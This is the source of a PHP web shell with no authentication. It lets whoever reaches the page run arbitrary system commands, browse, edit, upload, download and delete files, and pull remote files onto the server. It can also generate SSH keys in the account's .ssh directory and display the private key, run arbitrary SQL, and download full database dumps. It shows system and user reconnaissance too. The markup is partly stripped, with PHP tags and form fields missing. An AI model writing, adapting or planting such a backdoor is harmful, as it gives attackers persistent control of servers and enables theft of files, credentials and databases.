session_start();
error_reporting(0);

$current_path = isset($_GET["path"]) ? $_GET["path"] : getcwd();
@chdir($current_path);
$cwd = getcwd();

function getPhpInfo() {
$info = [];
$info['whoami'] = function_exists('get_current_user') ? get_current_user() : 'N/A';
$info['uid'] = function_exists('posix_getuid') ? posix_getuid() : 'N/A';
$info['gid'] = function_exists('posix_getgid') ? posix_getgid() : 'N/A';
$info['groups'] = function_exists('posix_getgroups') ? @implode(',', posix_getgroups()) : 'N/A';
$info['server_ip'] = isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : (isset($_SERVER['LOCAL_ADDR']) ? $_SERVER['LOCAL_ADDR'] : @gethostbyname(@gethostname()));
$info['client_ip'] = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'N/A';
$info['php_version'] = phpversion();
$info['os'] = PHP_OS;
$info['server_software'] = isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'N/A';
return $info;
}

function getPermissions($file) {
$perms = @fileperms($file);
if ($perms === false) return '?????????';

$info = '';

if (($perms & 0xC000) == 0xC000) $info = 's';
elseif (($perms & 0xA000) == 0xA000) $info = 'l';
elseif (($perms & 0x8000) == 0x8000) $info = '-';
elseif (($perms & 0x6000) == 0x6000) $info = 'b';
elseif (($perms & 0x4000) == 0x4000) $info = 'd';
elseif (($perms & 0x2000) == 0x2000) $info = 'c';
elseif (($perms & 0x1000) == 0x1000) $info = 'p';
else $info = 'u';

$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}

if (isset($_GET["mysqldump"]) && isset($_SESSION["db"])) {
$db = $_SESSION["db"];
$dump_file = tempnam(sys_get_temp_dir(), 'mysqldump_');
$command = "mysqldump -h" . escapeshellarg($db['host']) .
" -u" . escapeshellarg($db['user']) .
" -p" . escapeshellarg($db['pass']) .
" " . escapeshellarg($db['name']) .
" > " . escapeshellarg($dump_file) . " 2>&1";

exec($command, $output_dump, $return_var);

if ($return_var === 0 && file_exists($dump_file) && filesize($dump_file) > 0) {
header('Content-Description: File Transfer');
header('Content-Type: application/sql');
header('Content-Disposition: attachment; filename="' . $db['name'] . '_dump.sql"');
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($dump_file));
readfile($dump_file);
unlink($dump_file);
exit;
} else {
$dump_error = "Dump failed. Error: " . implode("\n", $output_dump);
unlink($dump_file);
}
}

if (isset($_POST['generate_ssh'])) {
$key_type = $_POST['key_type'] ?? 'rsa';
$key_name = $_POST['key_name'] ?? 'id_rsa';
$ssh_dir = $_POST['ssh_path'] ?? ($_SERVER['HOME'] ?? '/home/' . get_current_user()) . '/.ssh';

if (!is_dir($ssh_dir)) {
@mkdir($ssh_dir, 0700, true);
}

$private_key_path = $ssh_dir . '/' . $key_name;
$public_key_path = $private_key_path . '.pub';

$command = "ssh-keygen -t $key_type -f " . escapeshellarg($private_key_path) . " -N '' -q 2>&1";
$output = shell_exec($command);

if (file_exists($private_key_path) && file_exists($public_key_path)) {
$ssh_msg = "✓ SSH keys generated successfully in $ssh_dir";
$ssh_private = file_get_contents($private_key_path);
$ssh_public = file_get_contents($public_key_path);
} else {
$ssh_msg = "✗ Failed to generate SSH keys: $output";
}
}

$cmd_output = "";
if (isset($_POST["cmd"]) && !empty($_POST["cmd"])) {
$cmd = $_POST["cmd"];
$cmd_output = shell_exec($cmd . " 2>&1");
}

if (isset($_FILES["file_upload"])) {
$target = $cwd . DIRECTORY_SEPARATOR . basename($_FILES["file_upload"]["name"]);
if (move_uploaded_file($_FILES["file_upload"]["tmp_name"], $target)) {
$upload_msg = "File uploaded: " . basename($_FILES["file_upload"]["name"]);
} else {
$upload_msg = "Upload failed";
}
}

if (isset($_POST["image_url"]) && !empty($_POST["image_url"])) {
$image_url = $_POST["image_url"];
$image_name = basename(parse_url($image_url, PHP_URL_PATH));
if (empty($image_name) || !preg_match('/\.(jpg|jpeg|png|gif|webp|svg)$/i', $image_name)) {
$image_name = "image_" . time() . ".jpg";
}

$image_data = @file_get_contents($image_url);
if ($image_data !== false) {
$target = $cwd . DIRECTORY_SEPARATOR . $image_name;
if (file_put_contents($target, $image_data)) {
$upload_msg = "Image downloaded: " . $image_name;
} else {
$upload_msg = "Failed to save image";
}
} else {
$upload_msg = "Failed to download image from URL";
}
}

if (isset($_GET["download"])) {
$file = $cwd . DIRECTORY_SEPARATOR . $_GET["download"];
if (is_file($file) && is_readable($file)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
}

if (isset($_GET["delete"])) {
$target = $cwd . DIRECTORY_SEPARATOR . $_GET["delete"];
if (is_file($target)) @unlink($target);
elseif (is_dir($target)) @rmdir($target);
header("Location: ?tab=files&path=" . urlencode($cwd));
exit;
}

if (isset($_POST["edit_file"]) && isset($_POST["file_content"])) {
$file = $cwd . DIRECTORY_SEPARATOR . $_POST["edit_file"];
if (file_put_contents($file, $_POST["file_content"])) {
$edit_msg = "File saved: " . $_POST["edit_file"];
}
}

if (isset($_POST["new_file"]) && !empty($_POST["new_file"])) {
$newfile = $cwd . DIRECTORY_SEPARATOR . basename($_POST["new_file"]);
if (!file_exists($newfile)) {
file_put_contents($newfile, "");
$newfile_msg = "File created: " . basename($_POST["new_file"]);
}
}

if (isset($_POST["db_connect"])) {
$_SESSION["db"] = [
'host' => $_POST["db_host"],
'user' => $_POST["db_user"],
'pass' => $_POST["db_pass"],
'name' => $_POST["db_name"]
];
}

if (isset($_POST["db_disconnect"])) {
unset($_SESSION["db"]);
}

$php_info = getPhpInfo();
$files = @scandir($cwd) ?: [];
$tab = $_GET["tab"] ?? "files";
$header_image = "https://w.wallhaven.cc/full/jx/wallhaven-jx8wjw.jpg";

<!DOCTYPE html>


<meta charset="UTF-8">
Shell <title>Shell</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}

body {
background: #1a1a1a;
color: #c0c0c0;
font-family: 'Courier New', monospace;
font-size: 13px;
padding: 20px;
}

.container {
max-width: 1200px;
margin: 0 auto;
}

.header {
text-align: center;
padding: 20px 0;
border-bottom: 1px solid #333;
margin-bottom: 20px;
}

.header h1 {
color: #fff;
font-size: 24px;
letter-spacing: 2px;
margin-bottom: 10px;
}

.sysinfo {
background: #0a0a0a;
padding: 15px;
margin-bottom: 20px;
border: 1px solid #333;
line-height: 1.8;
}

.sysinfo span {
color: #888;
}

.tabs {
display: flex;
gap: 5px;
margin-bottom: 20px;
border-bottom: 1px solid #333;
}

.tabs a {
padding: 10px 20px;
background: #252525;
color: #888;
text-decoration: none;
border: 1px solid #333;
border-bottom: none;
transition: all 0.2s;
}

.tabs a:hover,
.tabs a.active {
background: #0a0a0a;
color: #fff;
}

.content {
background: #0a0a0a;
padding: 20px;
border: 1px solid #333;
min-height: 400px;
}

input[type="text"],
input[type="password"],
textarea,
select {
background: #1a1a1a;
border: 1px solid #333;
color: #c0c0c0;
padding: 8px;
font-family: 'Courier New', monospace;
font-size: 13px;
}

input[type="text"]:focus,
textarea:focus {
outline: none;
border-color: #555;
}

input[type="submit"],
button {
background: #252525;
border: 1px solid #333;
color: #c0c0c0;
padding: 8px 15px;
cursor: pointer;
font-family: 'Courier New', monospace;
transition: all 0.2s;
}

input[type="submit"]:hover,
button:hover {
background: #333;
color: #fff;
}

.cmd-box {
margin-bottom: 20px;
}

.cmd-box form {
display: flex;
gap: 10px;
align-items: center;
}

.cmd-box input[type="text"] {
flex: 1;
}

pre {
background: #000;
padding: 15px;
border: 1px solid #333;
overflow-x: auto;
color: #0f0;
margin: 10px 0;
}

table {
width: 100%;
border-collapse: collapse;
margin: 10px 0;
}

th {
background: #252525;
padding: 10px;
text-align: left;
border: 1px solid #333;
color: #fff;
}

td {
padding: 8px 10px;
border: 1px solid #333;
}

tr:hover {
background: #1a1a1a;
}

.file-link {
color: #4a9eff;
text-decoration: none;
}

.file-link:hover {
text-decoration: underline;
}

.dir-link {
color: #ffd700;
text-decoration: none;
}

.action-link {
color: #888;
text-decoration: none;
margin: 0 5px;
font-size: 11px;
}

.action-link:hover {
color: #fff;
}

.msg {
padding: 10px;
margin: 10px 0;
border: 1px solid #333;
}

.msg.success {
background: #1a3a1a;
color: #0f0;
}

.msg.error {
background: #3a1a1a;
color: #f00;
}

.form-group {
margin-bottom: 15px;
}

.form-group label {
display: block;
margin-bottom: 5px;
color: #888;
}

.form-group input,
.form-group select,
.form-group textarea {
width: 100%;
}

textarea {
min-height: 300px;
font-size: 12px;
}

.perms {
color: #0f0;
font-size: 11px;
}

.dump-btn {
background: #252525;
border: 1px solid #333;
color: #ffd700;
padding: 5px 10px;
text-decoration: none;
display: inline-block;
margin-left: 10px;
font-size: 11px;
}

.dump-btn:hover {
background: #333;
}
</style>


<div class="container">
<div class="header">
if (!empty($header_image)):
<img src="= htmlspecialchars($header_image) " alt="Header" style="max-width: 300px; max-height: 200px; margin-bottom: 10px;">


endif;

SHELL ACCESS


</div>

<div class="sysinfo">
<span>Server:</span> = htmlspecialchars($php_info['server_software'])

<span>System:</span> = htmlspecialchars($php_info['os'])

<span>User:</span> = htmlspecialchars($php_info['whoami']) (= htmlspecialchars($php_info['uid']) /= htmlspecialchars($php_info['gid']) )

<span>Groups:</span> = htmlspecialchars($php_info['groups'])

<span>Server IP:</span> = htmlspecialchars($php_info['server_ip']) | <span>Client IP:</span> = htmlspecialchars($php_info['client_ip'])

<span>PHP Version:</span> = htmlspecialchars($php_info['php_version'])

<span>Disable Function:</span> = htmlspecialchars(ini_get('disable_functions') ?: 'None')

<span>Directory:</span> = htmlspecialchars($cwd)
</div>

<div class="tabs">
<a href="?tab=files&path== urlencode($cwd) " class="= $tab === 'files' ? 'active' : '' ">Files</a>
<a href="?tab=terminal&path== urlencode($cwd) " class="= $tab === 'terminal' ? 'active' : '' ">Terminal</a>
<a href="?tab=upload&path== urlencode($cwd) " class="= $tab === 'upload' ? 'active' : '' ">Upload</a>
<a href="?tab=sshkeys&path== urlencode($cwd) " class="= $tab === 'sshkeys' ? 'active' : '' ">SSH Keys</a>
<a href="?tab=database&path== urlencode($cwd) " class="= $tab === 'database' ? 'active' : '' ">Database</a>
</div>

<div class="content">
if ($tab === "files"):
if (isset($newfile_msg)):
<div class="msg success">= $newfile_msg </div>
endif;

if (isset($edit_msg)):
<div class="msg success">= $edit_msg </div>
endif;

<div class="cmd-box">




</div>

if (isset($_GET['edit'])):

$edit_file = $cwd . DIRECTORY_SEPARATOR . $_GET['edit'];
if (is_file($edit_file) && is_readable($edit_file)):
$content = file_get_contents($edit_file);

Editing: = htmlspecialchars($_GET['edit'])




<textarea name="file_content">= htmlspecialchars($content) </textarea>




<a href="?tab=files&path== urlencode($cwd) "><button type="button">Cancel</button></a>

endif;
else:

<thead>

<th>Name</th>
<th>Size</th>
<th>Permissions</th>
<th>Options</th>

</thead>
<tbody>
foreach ($files as $file):
if ($file === '.') continue;

$full_path = $cwd . DIRECTORY_SEPARATOR . $file;
$perms = getPermissions($full_path);
$size = is_file($full_path) ? @filesize($full_path) : '--';







endforeach;
</tbody>

if (is_dir($full_path)):
<a href="?tab=files&path== urlencode($full_path) " class="dir-link">
= htmlspecialchars($file) /
</a>
else:
<a href="?tab=files&path== urlencode($cwd) &view== urlencode($file) " class="file-link">
= htmlspecialchars($file)
</a>
endif;
= is_numeric($size) ? number_format($size) . ' B' : $size <span class="perms">= $perms </span>
if (is_file($full_path)):
<a href="?tab=files&path== urlencode($cwd) &edit== urlencode($file) " class="action-link">Edit</a>
<a href="?path== urlencode($cwd) &download== urlencode($file) " class="action-link">Download</a>
endif;
<a href="?tab=files&path== urlencode($cwd) &delete== urlencode($file) " class="action-link" onclick="return confirm('Delete?')">Delete</a>


if (isset($_GET['view'])):

$view_file = $cwd . DIRECTORY_SEPARATOR . $_GET['view'];
if (is_file($view_file) && is_readable($view_file)):

Viewing: = htmlspecialchars($_GET['view'])


<pre>= htmlspecialchars(file_get_contents($view_file)) </pre>
endif;
endif;
endif;

elseif ($tab === "terminal"):
<div class="cmd-box">

<span>= htmlspecialchars($cwd) $</span>



</div>

if (!empty($cmd_output)):
<pre>= htmlspecialchars($cmd_output) </pre>
endif;

elseif ($tab === "upload"):
if (isset($upload_msg)):
<div class="msg success">= $upload_msg </div>
endif;

Upload from Computer



<div class="form-group">
<label>Select file to upload:</label>

</div>




<hr style="border: 1px solid #333; margin: 20px 0;">


Download Image from URL



<div class="form-group">
<label>Image URL:</label>

</div>



elseif ($tab === "sshkeys"):

SSH Key Generator



if (isset($ssh_msg)):
<div class="msg = strpos($ssh_msg, '✓') !== false ? 'success' : 'error' ">
= htmlspecialchars($ssh_msg)
</div>
endif;

if (isset($ssh_private) && isset($ssh_public)):
<h4>Private Key:</h4>
<pre>= htmlspecialchars($ssh_private) </pre>

<h4>Public Key:</h4>
<pre>= htmlspecialchars($ssh_public) </pre>
endif;


<div class="form-group">
<label>SSH Directory Path:</label>

</div>

<div class="form-group">
<label>Key Name:</label>

</div>

<div class="form-group">
<label>Key Type:</label>
<select name="key_type">
<option value="rsa">RSA</option>
<option value="ed25519">ED25519</option>
<option value="ecdsa">ECDSA</option>
<option value="dsa">DSA</option>
</select>
</div>




elseif ($tab === "database"):
if (isset($_SESSION['db'])):

$db = $_SESSION['db'];
$mysqli = @new mysqli($db['host'], $db['user'], $db['pass'], $db['name']);


if ($mysqli->connect_error):
<div class="msg error">Connection failed: = htmlspecialchars($mysqli->connect_error) </div>
unset($_SESSION['db']);
else:
<div class="msg success">
Connected to = htmlspecialchars($db['name']) as = htmlspecialchars($db['user'])
<a href="?tab=database&path== urlencode($cwd) &mysqldump=1" class="dump-btn">Download Full DB Dump</a>



</div>

if (isset($dump_error)):
<div class="msg error">= htmlspecialchars($dump_error) </div>
endif;

if (isset($_POST['sql']) && !empty($_POST['sql'])):

$result = $mysqli->query($_POST['sql']);


if ($result instanceof mysqli_result):


while ($field = $result->fetch_field()):
<th>= htmlspecialchars($field->name) </th>
endwhile;

while ($row = $result->fetch_assoc()):

foreach ($row as $val):

endforeach;

endwhile;
= htmlspecialchars($val)

elseif ($result === true):
<div class="msg success">Query executed successfully</div>
else:
<div class="msg error">= htmlspecialchars($mysqli->error) </div>
endif;
endif;


<div class="form-group">
<label>SQL Query:</label>
<textarea name="sql" placeholder="SELECT * FROM table_name"></textarea>
</div>


endif;

else:

Database Connection



<div class="form-group">
<label>Host:</label>

</div>
<div class="form-group">
<label>Username:</label>

</div>
<div class="form-group">
<label>Password:</label>

</div>
<div class="form-group">
<label>Database:</label>

</div>


endif;
endif;
</div>
</div>